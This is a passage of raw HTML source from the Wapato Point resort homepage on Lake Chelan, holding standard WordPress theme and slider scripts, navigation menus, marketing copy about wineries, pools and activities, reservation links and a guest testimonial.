href='https://wapatopoint.com/wp-content/plugins/revslider/public/assets/css/settings.css?ver=5.4.8.1' type='text/css' media='all' /> <style id='rs-plugin-settings-inline-css' type='text/css'> #rs-demo-id {} </style> <link rel='stylesheet' id='avia-scs-css' href='https://wapatopoint.com/wp-content/themes/enfold/css/shortcodes.css?ver=4.5.2' type='text/css' media='all' /> <link rel='stylesheet' id='avia-popup-css-css' href='https://wapatopoint.com/wp-content/themes/enfold/js/aviapopup/magnific-popup.css?ver=4.5.2' type='text/css' media='screen' /> <link rel='stylesheet' id='avia-lightbox-css' href='https://wapatopoint.com/wp-content/themes/enfold/css/avia-snippet-lightbox.css?ver=4.5.2' type='text/css' media='screen' /> <link rel='stylesheet' id='avia-widget-css-css' href='https://wapatopoint.com/wp-content/themes/enfold/css/avia-snippet-widget.css?ver=4.5.2' type='text/css' media='screen' /> <link rel='stylesheet' id='avia-dynamic-css' href='https://wapatopoint.com/wp-content/uploads/dynamic_avia/enfold.css?ver=5c4674d65a3dc' type='text/css' media='all' /> <link rel='stylesheet' id='avia-custom-css' href='https://wapatopoint.com/wp-content/themes/enfold/css/custom.css?ver=4.5.2' type='text/css' media='all' /> <script type='text/javascript' src='https://wapatopoint.com/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script> <script type='text/javascript' src='https://wapatopoint.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script> <script type='text/javascript' src='https://wapatopoint.com/wp-content/plugins/revslider/public/assets/js/jquery.themepunch.tools.min.js?ver=5.4.8.1'></script> <script type='text/javascript' src='https://wapatopoint.com/wp-content/plugins/revslider/public/assets/js/jquery.themepunch.revolution.min.js?ver=5.4.8.1'></script> <script type='text/javascript' src='https://wapatopoint.com/wp-content/themes/enfold/js/avia-compat.js?ver=4.5.2'></script> <link rel='https://api.w.org/' href='https://wapatopoint.com/wp-json/' /> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://wapatopoint.com/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://wapatopoint.com/wp-includes/wlwmanifest.xml" /> <meta name="generator" content="WordPress 5.1.1" /> <link rel="canonical" href="https://wapatopoint.com/" /> <link rel='shortlink' href='https://wapatopoint.com/' /> <link rel="alternate" type="application/json+oembed" href="https://wapatopoint.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwapatopoint.com%2F" /> <link rel="alternate" type="text/xml+oembed" href="https://wapatopoint.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwapatopoint.com%2F&#038;format=xml" /> <!-- start Simple Custom CSS and JS --> <style type="text/css"> .page-id-881 td { vertical-align: top; }</style> <!-- end Simple Custom CSS and JS --> <!-- start Simple Custom CSS and JS --> <style type="text/css"> h2 { color: #446984 !important; }</style> <!-- end Simple Custom CSS and JS --> <link rel="profile" href="http://gmpg.org/xfn/11" /> <link rel="alternate" type="application/rss+xml" title="Wapato Point RSS2 Feed" href="https://wapatopoint.com/feed/" /> <link rel="pingback" href="https://wapatopoint.com/xmlrpc.php" /> <style type='text/css' media='screen'> #top #header_main > .container, #top #header_main > .container .main_menu .av-main-nav > li > a, #top #header_main #menu-item-shop .cart_dropdown_link{ height:115px; line-height: 115px; } .html_top_nav_header .av-logo-container{ height:115px; } .html_header_top.html_header_sticky #top #wrap_all #main{ padding-top:143px; } </style> <!--[if lt IE 9]><script src="https://wapatopoint.com/wp-content/themes/enfold/js/html5shiv.js"></script><![endif]--> <meta name="generator" content="Powered by Slider Revolution 5.4.8.1 - responsive, Mobile-Friendly Slider Plugin for WordPress with comfortable drag and drop interface." /> <script type="text/javascript">function setREVStartSize(e){ try{ e.c=jQuery(e.c);var i=jQuery(window).width(),t=9999,r=0,n=0,l=0,f=0,s=0,h=0; if(e.responsiveLevels&&(jQuery.each(e.responsiveLevels,function(e,f){f>i&&(t=r=f,l=e),i>f&&f>r&&(r=f,n=e)}),t>r&&(l=n)),f=e.gridheight[l]||e.gridheight[0]||e.gridheight,s=e.gridwidth[l]||e.gridwidth[0]||e.gridwidth,h=i/s,h=h>1?1:h,f=Math.round(h*f),"fullscreen"==e.sliderLayout){var u=(e.c.width(),jQuery(window).height());if(void 0!=e.fullScreenOffsetContainer){var c=e.fullScreenOffsetContainer.split(",");if (c) jQuery.each(c,function(e,i){u=jQuery(i).length>0?u-jQuery(i).outerHeight(!0):u}),e.fullScreenOffset.split("%").length>1&&void 0!=e.fullScreenOffset&&e.fullScreenOffset.length>0?u-=jQuery(window).height()*parseInt(e.fullScreenOffset,0)/100:void 0!=e.fullScreenOffset&&e.fullScreenOffset.length>0&&(u-=parseInt(e.fullScreenOffset,0))}f=u}else void 0!=e.minHeight&&f<e.minHeight&&(f=e.minHeight);e.c.closest(".rev_slider_wrapper").css({height:f}) }catch(d){console.log("Failure at Presize of Slider:"+d)} };</script> <style type='text/css'> @font-face {font-family: 'entypo-fontello'; font-weight: normal; font-style: normal; src: url('https://wapatopoint.com/wp-content/themes/enfold/config-templatebuilder/avia-template-builder/assets/fonts/entypo-fontello.eot'); src: url('https://wapatopoint.com/wp-content/themes/enfold/config-templatebuilder/avia-template-builder/assets/fonts/entypo-fontello.eot?#iefix') format('embedded-opentype'), url('https://wapatopoint.com/wp-content/themes/enfold/config-templatebuilder/avia-template-builder/assets/fonts/entypo-fontello.woff') format('woff'), url('https://wapatopoint.com/wp-content/themes/enfold/config-templatebuilder/avia-template-builder/assets/fonts/entypo-fontello.ttf') format('truetype'), url('https://wapatopoint.com/wp-content/themes/enfold/config-templatebuilder/avia-template-builder/assets/fonts/entypo-fontello.svg#entypo-fontello') format('svg'); } #top .avia-font-entypo-fontello, body .avia-font-entypo-fontello, html body [data-av_iconfont='entypo-fontello']:before{ font-family: 'entypo-fontello'; } </style> <!-- Debugging Info for Theme support: Theme: Enfold Version: 4.5.2 Installed: enfold AviaFramework Version: 5.0 AviaBuilder Version: 0.9.5 aviaElementManager Version: 1.0.1 ML:256-PU:45-PLA:9 WP:5.1.1 Compress: CSS:disabled - JS:disabled Updates: enabled PLAu:9 --> </head> <body id="top" class="home page-template-default page page-id-504 rtl_columns stretched open_sans" itemscope="itemscope" itemtype="https://schema.org/WebPage" > <div id='wrap_all'> <header id='header' class='all_colors header_color light_bg_color av_header_top av_logo_left av_main_nav_header av_menu_right av_custom av_header_sticky av_header_shrinking av_header_stretch_disabled av_mobile_menu_phone av_header_searchicon_disabled av_header_unstick_top av_minimal_header av_bottom_nav_disabled av_alternate_logo_active av_header_border_disabled' role="banner" itemscope="itemscope" itemtype="https://schema.org/WPHeader" > <div id='header_meta' class='container_wrap container_wrap_meta av_secondary_right av_extra_header_active av_phone_active_left av_entry_id_504'> <div class='container'> <nav class='sub_menu' role="navigation" itemscope="itemscope" itemtype="https://schema.org/SiteNavigationElement" ><ul id="avia2-menu" class="menu"><li id="menu-item-1112" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1112"><a href="https://wapatopoint.com/web-cams/">WEB CAMS</a></li> <li id="menu-item-2889" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2889"><a href="https://wapatopoint.com/owners/">OWNERS</a></li> </ul></nav><div class='phone-info with_nav'><span>Give us a call: 888-768-9511</span></div> </div> </div> <div id='header_main' class='container_wrap container_wrap_logo'> <div class='container av-logo-container'><div class='inner-container'><span class='logo'><a href='https://wapatopoint.com/'><img height='100' width='300' src='https://wapatopoint.com/wp-content/uploads/2016/08/main-logo.png' alt='Wapato Point' /></a></span><nav class='main_menu' data-selectname='Select a page' role="navigation" itemscope="itemscope" itemtype="https://schema.org/SiteNavigationElement" ><div class="avia-menu av-main-nav-wrap"><ul id="avia-menu" class="menu av-main-nav"><li id="menu-item-673" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home current-menu-item page_item page-item-504 current_page_item menu-item-has-children menu-item-top-level menu-item-top-level-1"><a href="https://wapatopoint.com/" itemprop="url"><span class="avia-bullet"></span><span class="avia-menu-text">HOME</span><span class="avia-menu-fx"><span class="avia-arrow-wrap"><span class="avia-arrow"></span></span></span></a> <ul class="sub-menu"> <li id="menu-item-782" class="menu-item menu-item-type-post_type menu-item-object-page"><a href="https://wapatopoint.com/history/" itemprop="url"><span class="avia-bullet"></span><span class="avia-menu-text">HISTORY</span></a></li> </ul> </li> <li id="menu-item-795" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-top-level menu-item-top-level-2"><a href="https://wapatopoint.com/accommodations/" itemprop="url"><span class="avia-bullet"></span><span class="avia-menu-text">ACCOMMODATIONS</span><span class="avia-menu-fx"><span class="avia-arrow-wrap"><span class="avia-arrow"></span></span></span></a> <ul class="sub-menu"> <li id="menu-item-808" class="menu-item menu-item-type-post_type menu-item-object-page"><a href="https://wapatopoint.com/amenities/" itemprop="url"><span class="avia-bullet"></span><span class="avia-menu-text">AMENITIES</span></a></li> <li id="menu-item-828" class="menu-item menu-item-type-post_type menu-item-object-page"><a href="https://wapatopoint.com/our-rooms/" itemprop="url"><span class="avia-bullet"></span><span class="avia-menu-text">OUR ROOMS</span></a></li> <li id="menu-item-829" class="menu-item menu-item-type-custom menu-item-object-custom"><a href="/accommodations/" itemprop="url"><span class="avia-bullet"></span><span class="avia-menu-text">RENTAL RATES</span></a></li> <li id="menu-item-880" class="menu-item menu-item-type-post_type menu-item-object-page"><a href="https://wapatopoint.com/photo-gallery/" itemprop="url"><span class="avia-bullet"></span><span class="avia-menu-text">PHOTO GALLERY</span></a></li> <li id="menu-item-893" class="menu-item menu-item-type-post_type menu-item-object-page"><a href="https://wapatopoint.com/sales/" itemprop="url"><span class="avia-bullet"></span><span class="avia-menu-text">SALES</span></a></li> <li id="menu-item-897" class="menu-item menu-item-type-post_type menu-item-object-page"><a href="https://wapatopoint.com/resort-map/" itemprop="url"><span class="avia-bullet"></span><span class="avia-menu-text">RESORT MAP</span></a></li> <li id="menu-item-903" class="menu-item menu-item-type-post_type menu-item-object-page"><a href="https://wapatopoint.com/web-cams/" itemprop="url"><span class="avia-bullet"></span><span class="avia-menu-text">WEB CAMS</span></a></li> </ul> </li> <li id="menu-item-911" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-top-level menu-item-top-level-3"><a href="https://wapatopoint.com/activities/" itemprop="url"><span class="avia-bullet"></span><span class="avia-menu-text">ACTIVITIES</span><span class="avia-menu-fx"><span class="avia-arrow-wrap"><span class="avia-arrow"></span></span></span></a> <ul class="sub-menu"> <li id="menu-item-2638" class="menu-item menu-item-type-post_type menu-item-object-page"><a href="https://wapatopoint.com/dial-jones-tennis-academy/" itemprop="url"><span class="avia-bullet"></span><span class="avia-menu-text">DIAL JONES TENNIS ACADEMY</span></a></li> <li id="menu-item-915" class="menu-item menu-item-type-post_type menu-item-object-page"><a href="https://wapatopoint.com/activities-schedule/" itemprop="url"><span class="avia-bullet"></span><span class="avia-menu-text">ACTIVITIES SCHEDULE</span></a></li> <li id="menu-item-926" class="menu-item menu-item-type-post_type menu-item-object-page"><a href="https://wapatopoint.com/water-sports/" itemprop="url"><span class="avia-bullet"></span><span class="avia-menu-text">WATER SPORTS</span></a></li> <li id="menu-item-934" class="menu-item menu-item-type-post_type menu-item-object-page"><a href="https://wapatopoint.com/general-sports/" itemprop="url"><span class="avia-bullet"></span><span class="avia-menu-text">GENERAL SPORTS</span></a></li> <li id="menu-item-942" class="menu-item menu-item-type-post_type menu-item-object-page"><a href="https://wapatopoint.com/fitness/" itemprop="url"><span class="avia-bullet"></span><span class="avia-menu-text">FITNESS</span></a></li> <li id="menu-item-958" class="menu-item menu-item-type-post_type menu-item-object-page"><a href="https://wapatopoint.com/recreational/" itemprop="url"><span class="avia-bullet"></span><span class="avia-menu-text">RECREATIONAL</span></a></li> <li id="menu-item-966" class="menu-item menu-item-type-post_type menu-item-object-page"><a href="https://wapatopoint.com/for-kids/" itemprop="url"><span class="avia-bullet"></span><span class="avia-menu-text">FOR KIDS</span></a></li> <li id="menu-item-951" class="menu-item menu-item-type-post_type menu-item-object-page"><a href="https://wapatopoint.com/wine-tasting/" itemprop="url"><span class="avia-bullet"></span><span class="avia-menu-text">WINE TASTING</span></a></li> <li id="menu-item-1153" class="menu-item menu-item-type-post_type menu-item-object-page"><a href="https://wapatopoint.com/local-eateries/" itemprop="url"><span class="avia-bullet"></span><span class="avia-menu-text">NEIGHBORHOOD EATERIES</span></a></li> <li id="menu-item-1191" class="menu-item menu-item-type-post_type menu-item-object-page"><a href="https://wapatopoint.com/local-outings/" itemprop="url"><span class="avia-bullet"></span><span class="avia-menu-text">WHAT THE LOCALS DO</span></a></li> </ul> </li> <li id="menu-item-672" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-top-level menu-item-top-level-4"><a href="https://wapatopoint.com/contact/" itemprop="url"><span class="avia-bullet"></span><span class="avia-menu-text">CONTACT</span><span class="avia-menu-fx"><span class="avia-arrow-wrap"><span class="avia-arrow"></span></span></span></a> <ul class="sub-menu"> <li id="menu-item-994" class="menu-item menu-item-type-post_type menu-item-object-page"><a href="https://wapatopoint.com/directions/" itemprop="url"><span class="avia-bullet"></span><span class="avia-menu-text">DIRECTIONS</span></a></li> <li id="menu-item-1012" class="menu-item menu-item-type-post_type menu-item-object-page"><a href="https://wapatopoint.com/employment/" itemprop="url"><span class="avia-bullet"></span><span class="avia-menu-text">EMPLOYMENT</span></a></li> </ul> </li> <li id="menu-item-2509" class="menu-item menu-item-type-custom menu-item-object-custom av-menu-button av-menu-button-bordered menu-item-top-level menu-item-top-level-5"><a target="_blank" href="https://be.synxis.com/?adult=1&amp;arrive=2018-07-26&amp;chain=17448&amp;child=0¤cy=USD&amp;depart=2018-07-28&amp;hotel=77361&amp;level=hotel&amp;locale=en-US&amp;rooms=1&amp;sbe_ri=0&amp;sbe_sid=PyQLcbBKchvXB1rqt0w90x03" itemprop="url"><span class="avia-bullet"></span><span class="avia-menu-text">RESERVATIONS</span><span class="avia-menu-fx"><span class="avia-arrow-wrap"><span class="avia-arrow"></span></span></span></a></li> <li class="av-burger-menu-main menu-item-avia-special "> <a href="#"> <span class="av-hamburger av-hamburger--spin av-js-hamburger"> <span class="av-hamburger-box"> <span class="av-hamburger-inner"></span> <strong>Menu</strong> </span> </span> </a> </li></ul></div></nav></div> </div> <!-- end container_wrap--> </div> <div class='header_bg'></div> <!-- end header --> </header> <div id='main' class='all_colors' data-scroll-offset='113'> <div id='layer_slider_1' class='avia-layerslider main_color avia-shadow avia-builder-el-0 el_before_av_one_full avia-builder-el-first container_wrap fullsize' style=' height: 601px;' > <div id="rev_slider_5_1_wrapper" class="rev_slider_wrapper fullwidthbanner-container" data-source="gallery" style="margin:0px auto;background:transparent;padding:0px;margin-top:0px;margin-bottom:0px;"> <!-- START REVOLUTION SLIDER 5.4.8.1 fullwidth mode --> <div id="rev_slider_5_1" class="rev_slider fullwidthabanner" style="display:none;" data-version="5.4.8.1"> <ul> <!-- SLIDE --> <li data-index="rs-18" data-transition="fade" data-slotamount="default" data-hideafterloop="0" data-hideslideonmobile="off" data-easein="Power4.easeInOut" data-easeout="Power4.easeInOut" data-masterspeed="2000" data-thumb="https://img.youtube.com/vi/2MbiBri8l_g/maxresdefault.jpg" data-rotate="0" data-saveperformance="off" data-title="Intro" data-param1="" data-param2="" data-param3="" data-param4="" data-param5="" data-param6="" data-param7="" data-param8="" data-param9="" data-param10="" data-description=""> <!-- MAIN IMAGE --> <img src="https://img.youtube.com/vi/2MbiBri8l_g/maxresdefault.jpg" alt="" title="HOME" data-bgposition="center center" data-bgfit="cover" data-bgparallax="10" class="rev-slidebg" data-no-retina> <!-- LAYERS --> <!-- BACKGROUND VIDEO LAYER --> <div class="rs-background-video-layer" data-forcerewind="on" data-volume="mute" data-ytid="KZvIurbXqSk" data-videoattributes="version=3&amp;enablejsapi=1&amp;html5=1&amp;hd=1&wmode=opaque&showinfo=0&rel=0;;origin=https://wapatopoint.com;" data-videorate="1" data-videowidth="100%" data-videoheight="100%" data-videocontrols="none" data-videoloop="none" data-forceCover="1" data-aspectratio="16:9" data-autoplay="true" data-autoplayonlyfirsttime="false" ></div> </li> </ul> <div class="tp-bannertimer tp-bottom" style="visibility: hidden !important;"></div> </div> <script>var htmlDiv = document.getElementById("rs-plugin-settings-inline-css"); var htmlDivCss=""; if(htmlDiv) { htmlDiv.innerHTML = htmlDiv.innerHTML + htmlDivCss; }else{ var htmlDiv = document.createElement("div"); htmlDiv.innerHTML = "<style>" + htmlDivCss + "</style>"; document.getElementsByTagName("head")[0].appendChild(htmlDiv.childNodes[0]); } </script> <script type="text/javascript"> if (setREVStartSize!==undefined) setREVStartSize( {c: '#rev_slider_5_1', responsiveLevels: [1240,1024,778,480], gridwidth: [1240,1024,778,480], gridheight: [600,500,400,300], sliderLayout: 'fullwidth'}); var revapi5, tpj; (function() { if (!/loaded|interactive|complete/.test(document.readyState)) document.addEventListener("DOMContentLoaded",onLoad); else onLoad(); function onLoad() { if (tpj===undefined) { tpj = jQuery; if("off" == "on") tpj.noConflict();} if(tpj("#rev_slider_5_1").revolution == undefined){ revslider_showDoubleJqueryError("#rev_slider_5_1"); }else{ revapi5 = tpj("#rev_slider_5_1").show().revolution({ sliderType:"hero", jsFileLocation:"//wapatopoint.com/wp-content/plugins/revslider/public/assets/js/", sliderLayout:"fullwidth", dottedOverlay:"none", delay:9000, responsiveLevels:[1240,1024,778,480], visibilityLevels:[1240,1024,778,480], gridwidth:[1240,1024,778,480], gridheight:[600,500,400,300], lazyType:"none", parallax: { type:"mouse", origo:"slidercenter", speed:2000, speedbg:0, speedls:0, levels:[2,3,4,5,6,7,12,16,10,50,47,48,49,50,51,55], }, shadow:0, spinner:"off", autoHeight:"off", disableProgressBar:"on", hideThumbsOnMobile:"off", hideSliderAtLimit:0, hideCaptionAtLimit:0, hideAllCaptionAtLilmit:0, debugMode:false, fallbacks: { simplifyAll:"off", disableFocusListener:false, } }); }; /* END OF revapi call */ }; /* END OF ON LOAD FUNCTION */ }()); /* END OF WRAPPING FUNCTION */ </script> </div><!-- END REVOLUTION SLIDER --></div><div id='after_layer_slider_1' class='main_color av_default_container_wrap container_wrap fullsize' style=' ' ><div class='container' ><div class='template-page content av-content-full alpha units'><div class='post-entry post-entry-type-page post-entry-504'><div class='entry-content-wrapper clearfix'> <div class="flex_column av_one_full flex_column_div av-zero-column-padding first avia-builder-el-1 el_after_av_revolutionslider el_before_av_one_third avia-builder-el-first " style='border-radius:0px; '><div style='padding-bottom:10px; ' class='av-special-heading av-special-heading-h2 blockquote modern-quote modern-centered avia-builder-el-2 avia-builder-el-no-sibling '><h2 class='av-special-heading-tag ' itemprop="headline" >IT’S TIME TO CREATE YOUR OWN EXPERIENCE AT LAKE CHELAN</h2><div class ='av-subheading av-subheading_below ' style='font-size:15px;'><p>Visitors have found Wapato Point to be the quintessential Lake Chelan experience for generations. Continue your traditions or start NEW ONES!</p> </div><div class='special-heading-border'><div class='special-heading-inner-border' ></div></div></div></div> <div class="flex_column av_one_third flex_column_div av-zero-column-padding first avia-builder-el-3 el_after_av_one_full el_before_av_one_third column-top-margin" style='border-radius:0px; '><section class="av_textblock_section " itemscope="itemscope" itemtype="https://schema.org/CreativeWork" ><div class='avia_textblock ' itemprop="text" ><p><a href="https://wapatopoint.com/wine-tasting/" data-wplink-edit="true"><img class="alignnone wp-image-3626 size-full" src="https://wapatopoint.com/wp-content/uploads/2019/04/callout1.jpg" alt="" width="600" height="398" srcset="https://wapatopoint.com/wp-content/uploads/2019/04/callout1.jpg 600w, https://wapatopoint.com/wp-content/uploads/2019/04/callout1-300x199.jpg 300w, https://wapatopoint.com/wp-content/uploads/2019/04/callout1-450x299.jpg 450w" sizes="(max-width: 600px) 100vw, 600px" /></a></p> <h3 style="text-align: center;">13 WINERIES WITHIN 3 MILES</h3> </div></section></div><div class="flex_column av_one_third flex_column_div av-zero-column-padding avia-builder-el-5 el_after_av_one_third el_before_av_one_third column-top-margin" style='border-radius:0px; '><section class="av_textblock_section " itemscope="itemscope" itemtype="https://schema.org/CreativeWork" ><div class='avia_textblock ' itemprop="text" ><p><a href="https://wapatopoint.com/activities/" data-wplink-edit="true"><img class="alignnone wp-image-3621 size-full" src="https://wapatopoint.com/wp-content/uploads/2019/04/callout-2.jpg" alt="" width="600" height="398" srcset="https://wapatopoint.com/wp-content/uploads/2019/04/callout-2.jpg 600w, https://wapatopoint.com/wp-content/uploads/2019/04/callout-2-300x199.jpg 300w, https://wapatopoint.com/wp-content/uploads/2019/04/callout-2-450x299.jpg 450w" sizes="(max-width: 600px) 100vw, 600px" /></a></p> <h3 style="text-align: center;">GREAT LOCATION, NUMEROUS AMENITIES, AND TONS OF FUN</h3> </div></section></div><div class="flex_column av_one_third flex_column_div av-zero-column-padding avia-builder-el-7 el_after_av_one_third el_before_av_section avia-builder-el-last column-top-margin" style='border-radius:0px; '><section class="av_textblock_section " itemscope="itemscope" itemtype="https://schema.org/CreativeWork" ><div class='avia_textblock ' itemprop="text" ><p><a href="https://be.synxis.com/?adult=1&#038;arrive=2018-07-26&#038;chain=17448&#038;child=0%C2%A4cy=USD&#038;depart=2018-07-28&#038;hotel=77361&#038;level=hotel&#038;locale=en-US&#038;rooms=1&#038;sbe_ri=0&#038;sbe_sid=PyQLcbBKchvXB1rqt0w90x03" data-wplink-edit="true"><img class="alignnone wp-image-3622 size-full" src="https://wapatopoint.com/wp-content/uploads/2019/04/callout-3.jpg" alt="" width="600" height="398" srcset="https://wapatopoint.com/wp-content/uploads/2019/04/callout-3.jpg 600w, https://wapatopoint.com/wp-content/uploads/2019/04/callout-3-300x199.jpg 300w, https://wapatopoint.com/wp-content/uploads/2019/04/callout-3-450x299.jpg 450w" sizes="(max-width: 600px) 100vw, 600px" /></a></p> <h3 style="text-align: center;">BOOK NOW</h3> </div></section></div></div></div></div><!-- close content main div --></div></div><div id='av_section_1' class='avia-section main_color avia-section-large avia-no-border-styling avia-bg-style-scroll avia-builder-el-9 el_after_av_one_third el_before_av_one_full av-minimum-height av-minimum-height-custom container_wrap fullsize' style='background-color: #7c94ad; ' ><div class='container' style='height:300px'><div class='template-page content av-content-full alpha units'><div class='post-entry post-entry-type-page post-entry-504'><div class='entry-content-wrapper clearfix'> <div class="flex_column av_two_third flex_column_div av-zero-column-padding first avia-builder-el-10 el_before_av_one_third avia-builder-el-first " style='border-radius:0px; '><section class="av_textblock_section " itemscope="itemscope" itemtype="https://schema.org/CreativeWork" ><div class='avia_textblock ' itemprop="text" ><h2 style="font-size: 30px;"><span style="color: #ededed;">CALL US AT: 888-768-9511<br /> OR MAKE A RESERVATION RIGHT NOW!<br /> Limited specials may be available</span></h2> <p><span style="color: #f2f2f2;">Book early and enjoy the dates you want for your Lake Chelan Vacation</span></p> </div></section></div><div class="flex_column av_one_third flex_column_div av-zero-column-padding avia-builder-el-12 el_after_av_two_third avia-builder-el-last " style='border-radius:0px; '><div class='avia-button-wrap avia-button-center avia-builder-el-13 avia-builder-el-no-sibling '><a href='https://be.synxis.com/?adult=1&arrive=2018-07-26&chain=17448&child=0¤cy=USD&depart=2018-07-28&hotel=77361&level=hotel&locale=en-US&rooms=1&sbe_ri=0&sbe_sid=PyQLcbBKchvXB1rqt0w90x03' class='avia-button avia-icon_select-no avia-color-light avia-size-x-large avia-position-center ' ><span class='avia_iconbox_title' >ONLINE RESERVATIONS</span></a></div></div> </div></div></div><!-- close content main div --></div></div><div id='after_section_1' class='main_color av_default_container_wrap container_wrap fullsize' style=' ' ><div class='container' ><div class='template-page content av-content-full alpha units'><div class='post-entry post-entry-type-page post-entry-504'><div class='entry-content-wrapper clearfix'></p> <div class="flex_column av_one_full flex_column_div av-zero-column-padding first avia-builder-el-14 el_after_av_section el_before_av_one_half avia-builder-el-first " style='border-radius:0px; '><section class="av_textblock_section " itemscope="itemscope" itemtype="https://schema.org/CreativeWork" ><div class='avia_textblock ' itemprop="text" ><h2 style="text-align: center;">HOW MANY REASONS DO YOU NEED TO COME TO THE POINT?</h2> <p style="text-align: center;"><strong style="font-size: 20px;">116 Acres and 1.5 Miles of Waterfront&#8230;</strong><br /> There simply isn&#8217;t another resort or hotel on Lake Chelan that even begins to come close. This is why we are known as &#8220;THE POINT&#8221;.</p> </div></section></div> <div class="flex_column av_one_half flex_column_div av-zero-column-padding first avia-builder-el-16 el_after_av_one_full el_before_av_one_half column-top-margin" style='border-radius:0px; '><section class="av_textblock_section " itemscope="itemscope" itemtype="https://schema.org/CreativeWork" ><div class='avia_textblock ' itemprop="text" ><p><strong><img class="alignnone wp-image-3623 size-full" src="https://wapatopoint.com/wp-content/uploads/2019/04/location-wapato-lake-chelan.jpg" alt="" width="600" height="398" srcset="https://wapatopoint.com/wp-content/uploads/2019/04/location-wapato-lake-chelan.jpg 600w, https://wapatopoint.com/wp-content/uploads/2019/04/location-wapato-lake-chelan-300x199.jpg 300w, https://wapatopoint.com/wp-content/uploads/2019/04/location-wapato-lake-chelan-450x299.jpg 450w" sizes="(max-width: 600px) 100vw, 600px" /></strong></p> <p><strong>Location, Location&#8230;</strong></p> <p>The Point is situated at the base of the Cascade Mountain foothills on the uplake side and the high desert terrain on the downlake side. It truly is unique.</p> </div></section></div> <div class="flex_column av_one_half flex_column_div av-zero-column-padding avia-builder-el-18 el_after_av_one_half el_before_av_one_half column-top-margin" style='border-radius:0px; '><section class="av_textblock_section " itemscope="itemscope" itemtype="https://schema.org/CreativeWork" ><div class='avia_textblock ' itemprop="text" ><p><img class="alignnone wp-image-3625 size-full" src="https://wapatopoint.com/wp-content/uploads/2019/04/wineries-lake-chelan.jpg" alt="" width="600" height="398" srcset="https://wapatopoint.com/wp-content/uploads/2019/04/wineries-lake-chelan.jpg 600w, https://wapatopoint.com/wp-content/uploads/2019/04/wineries-lake-chelan-300x199.jpg 300w, https://wapatopoint.com/wp-content/uploads/2019/04/wineries-lake-chelan-450x299.jpg 450w" sizes="(max-width: 600px) 100vw, 600px" /></p> <p><strong>13 Wineries Within 3 Miles&#8230;</strong><br /> There are over 30 wineries in the Chelan Valley and 13 of them are within 3 miles of &#8220;The Point&#8221;.  The rest are within 10 miles. If you want to explore our wine industry, Wapato Point is the perfect home base.</p> </div></section></div> <div class="flex_column av_one_half flex_column_div av-zero-column-padding first avia-builder-el-20 el_after_av_one_half el_before_av_one_half column-top-margin" style='border-radius:0px; '><section class="av_textblock_section " itemscope="itemscope" itemtype="https://schema.org/CreativeWork" ><div class='avia_textblock ' itemprop="text" ><p><strong><img class="alignnone wp-image-3627 size-full" src="https://wapatopoint.com/wp-content/uploads/2019/04/wapato-pools.jpg" alt="" width="600" height="398" srcset="https://wapatopoint.com/wp-content/uploads/2019/04/wapato-pools.jpg 600w, https://wapatopoint.com/wp-content/uploads/2019/04/wapato-pools-300x199.jpg 300w, https://wapatopoint.com/wp-content/uploads/2019/04/wapato-pools-450x299.jpg 450w" sizes="(max-width: 600px) 100vw, 600px" /></strong></p> <p><strong>9 Pools On Property&#8230;</strong><br /> We have 8 outdoor pools for seasonal use and one indoor Olympic pool facility, complete with workout area and hot tub.</p> </div></section></div> <div class="flex_column av_one_half flex_column_div av-zero-column-padding avia-builder-el-22 el_after_av_one_half el_before_av_section avia-builder-el-last column-top-margin" style='border-radius:0px; '><section class="av_textblock_section " itemscope="itemscope" itemtype="https://schema.org/CreativeWork" ><div class='avia_textblock ' itemprop="text" ><p><img class="alignnone wp-image-3629 size-full" src="https://wapatopoint.com/wp-content/uploads/2019/04/activities-wapato-point.jpg" alt="" width="600" height="398" srcset="https://wapatopoint.com/wp-content/uploads/2019/04/activities-wapato-point.jpg 600w, https://wapatopoint.com/wp-content/uploads/2019/04/activities-wapato-point-300x199.jpg 300w, https://wapatopoint.com/wp-content/uploads/2019/04/activities-wapato-point-450x299.jpg 450w" sizes="(max-width: 600px) 100vw, 600px" /></p> <p><strong>Activities For Everyone&#8230;</strong><br /> Wine tasting, Waterslide Park, Boating, Swimming, Skydiving, Jet Skis, Fishing, Tours, Skiing and a whole host of year round events.</p> </div></section></div> </div></div></div><!-- close content main div --></div></div><div id='av_section_2' class='avia-section main_color avia-section-default avia-no-shadow avia-bg-style-scroll avia-builder-el-24 el_after_av_one_half avia-builder-el-last container_wrap fullsize' style='background-color: #f1f1f1; ' ><div class='container' ><div class='template-page content av-content-full alpha units'><div class='post-entry post-entry-type-page post-entry-504'><div class='entry-content-wrapper clearfix'> <div class="flex_column av_one_full flex_column_div av-zero-column-padding first avia-builder-el-25 avia-builder-el-no-sibling " style='border-radius:0px; '><div style='padding-bottom:10px; font-size:30px;' class='av-special-heading av-special-heading-h3 blockquote modern-quote modern-centered avia-builder-el-26 el_before_av_testimonials avia-builder-el-first av-inherit-size '><h3 class='av-special-heading-tag ' itemprop="headline" >WHAT OUR GUESTS ARE SAYING</h3><div class='special-heading-border'><div class='special-heading-inner-border' ></div></div></div> <div data-autoplay='1' data-interval='5' data-animation='fade' data-hoverpause='1' class='avia-testimonial-wrapper avia-slider-testimonials avia-slider-2-testimonials avia_animate_when_almost_visible av-large-testimonial-slider '> <section class ='avia-testimonial-row'><div class='avia-testimonial av_one_half flex_column no_margin avia-testimonial-row-1 avia-first-testimonial' itemscope="itemscope" itemtype="https://schema.org/Person" ><div class='avia-testimonial_inner'><div class='avia-testimonial-content ' itemscope="itemscope" itemtype="https://schema.org/CreativeWork" ><p>I have been coming to Lake Chelan and Wapato Point since I was 6 years old. I still come every year and now my own son is 6. Thank you for generations of memories.</p> </div><div class='avia-testimonial-meta'><div class='avia-testimonial-arrow-wrap'><div class='avia-arrow'></div></div><div class='avia-testimonial-meta-mini'><strong class='avia-testimonial-name' itemprop="name" >ERIC K</strong></div></div></div></div> <div class='avia-testimonial av_one_half flex_column no_margin 